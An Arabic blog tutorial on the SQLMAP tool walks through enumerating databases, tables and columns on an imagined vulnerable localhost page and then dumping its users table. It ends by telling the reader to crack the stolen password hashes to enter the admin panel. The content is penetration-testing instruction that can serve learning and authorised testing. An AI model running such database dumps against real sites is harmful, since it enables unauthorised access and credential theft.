الدرس موجه ﻷغراض تعليمية و الكاتب و الموقع غير مسؤوﻻن عن أي أفعال تصدر منك باستخدامك للمعلومات المذكورة في الدرس.الدرس موجه لمن يمتلكون خبرة و لو بسيطة في التعامل مع أنظمة اختبار اﻹختراق كباك تراك و كالي لينكس،لن يتم التطبيق على أهداف حقيقة لتجنب اﻹستخدام السيء و الملاحقات القانونية.الدرس عبارة عن سيناريو تخيلي لعملية إختراق حقيقية و لكن بتحفظ
يعتبر مشروع SQLMAP أحد أكثر مشاريع إختبار اﻹختراق انتشارا سواء في أوساط الهاكرز اﻷخلاقيين أو غيرهم من اصحاب القبعات السوداء،لعدة أسباب أهمها الفعالية الكبيرة التي يتميز بها هذا البرنامج عن غيره من البرامج التي تتيح فحص مختلف قواعد البيانات.تمت برمجة مشروع SQLMAP باستخدام لغة البرمجة بايثون،بحيث تم التركيز على جعلها آداة خفيفة على ذاكرة الجهاز مع عدم إغفال الفاعلية،و على حسب مطوريها فإنهم وجدوا ذلك في بايثون.

بإمكان أداة SQLMAP القيام بفحص عدة أنواع من قواعد البيانات و هي:

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,
SQLite, Firebird, Sybase and SAP MaxDB database management systems.

طريقة اﻹستخدام: بالنسبة لمن يستخدمون نظام باك تراك فعليهم كتابة اﻷوامر كالتالي

./sqlmap.py command

في حين من يستخدمون نظام كالي لينكس فعليهم كتابة اﻷوامر كالتالي:

sqlmap command

باعتبار أني من مستخدمي كالي لينكس فسأستعمل اﻷمر الثاني.ﻻستعراض قواعد البيانات الموجودة على السيرفر يكفي كتابة اﻷمر التالي:

sqlmap -u “http://127.0.0.1/vurln.php?user=relax” –dbs –dbms=mysql

دعونا نشرح هذا اﻷمر بالتفصيل:
sqlmap : و هو مشروعنا الذي هو محور الدرس بطبيعة الحال
u- : و معناها أننا نريد فحص URL مشكوك في أمره،يجب كتابة العنوان مباشرة بعد u- بين علامتي تنصيص مزدوجتين “URL”
الرابط الذي أرفقناه هو عبارة عن رابط عضوية الشخص المسمى relax.
dbs- : و معناها أننا نطلب من مشروع SQLMAP التحري عن كل قواعد البيانات و عرض أسمائها
dbms=mysql- : و معناها أننا نخبر مشروع SQLMAP بأن السيرفر يستخدم محرك قواعد البيانات MySQL
سنفترض أنه المشروع قد قام بالبحث و وجدت عددا من قواعد البيانات هي كالتالي:

available databases [4]:
information_schema
mysql
performance_schema
vurln

سنستهدف اﻵن قاعدة البيانات vurln و نريد استعراض الجداول التي تحويها…اﻷمر بسيط جدا فكل ما عليك فعله هو تطبيق اﻷمر التالي:

sqlmap -u “http://127.0.0.1/vurln.php?user=relax” -D vurln –tables

أعتقد أن اﻷمر بسيط و لم يتغير كثيرا عن سابقه إﻻ في نهايته:
D- معناها قم بعملية Dumping لقاعدة البيانات vurln و قم باستخراج ما سنطلبه و هو
tables- : بعد انتهاء عملية Dumping قم باستعراض جداول قاعدة البيانات و لنفترض أنها تحوي جدوﻻ واحدا هو جدول المستخدمين

Database: vurln
[1 table] +——-+
| users |
+——-+

اﻵن سنعمل على استخراج الخانات الموجودة في الجدول users عن طريق اﻷمر التالي:

sqlmap -u “http://127.0.0.1/vurln.php?user=relax” -D vurln -T users –col

سنشرح فقط اﻷجزاء الجديدة من اﻷمر،بعد القيام بعملية Dumping لقاعدة البيانات:
T- معناها أعد عملية Dumping للجدول المعطى و هو users
col– : و معناها استخرج الخانات Columns و سنفترض أنه قد أعطانا النتيجة التالية:

Database: vurln
Table: users
[3 columns] +———-+————-+
| Column      Type            |
+———-+————-+
| ID            | tinyint(4)     |
| password | varchar(32) |
| username | varchar(20) |
+———-+————-+

أخيرا و ﻹتمام العملية لم يبقى لنا سوى العمل على استعراض الجدول عن طريق اﻷمر

sqlmap -u “http://127.0.0.1/vurln.php?user=relax” -D vurln -T users –dump

لم يبقى أمامك إﻻ كسر تشفير كلمات المرور من أجل الدخول إلى لوحة تحكم اﻹدارة.

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *

Fill out this field
Fill out this field
الرجاء إدخال عنوان بريد إلكتروني صالح.
You need to agree with the terms to proceed

هذا الموقع يستخدم Akismet للحدّ من التعليقات المزعجة والغير مرغوبة. تعرّف على كيفية معالجة بيانات تعليقك.

القائمة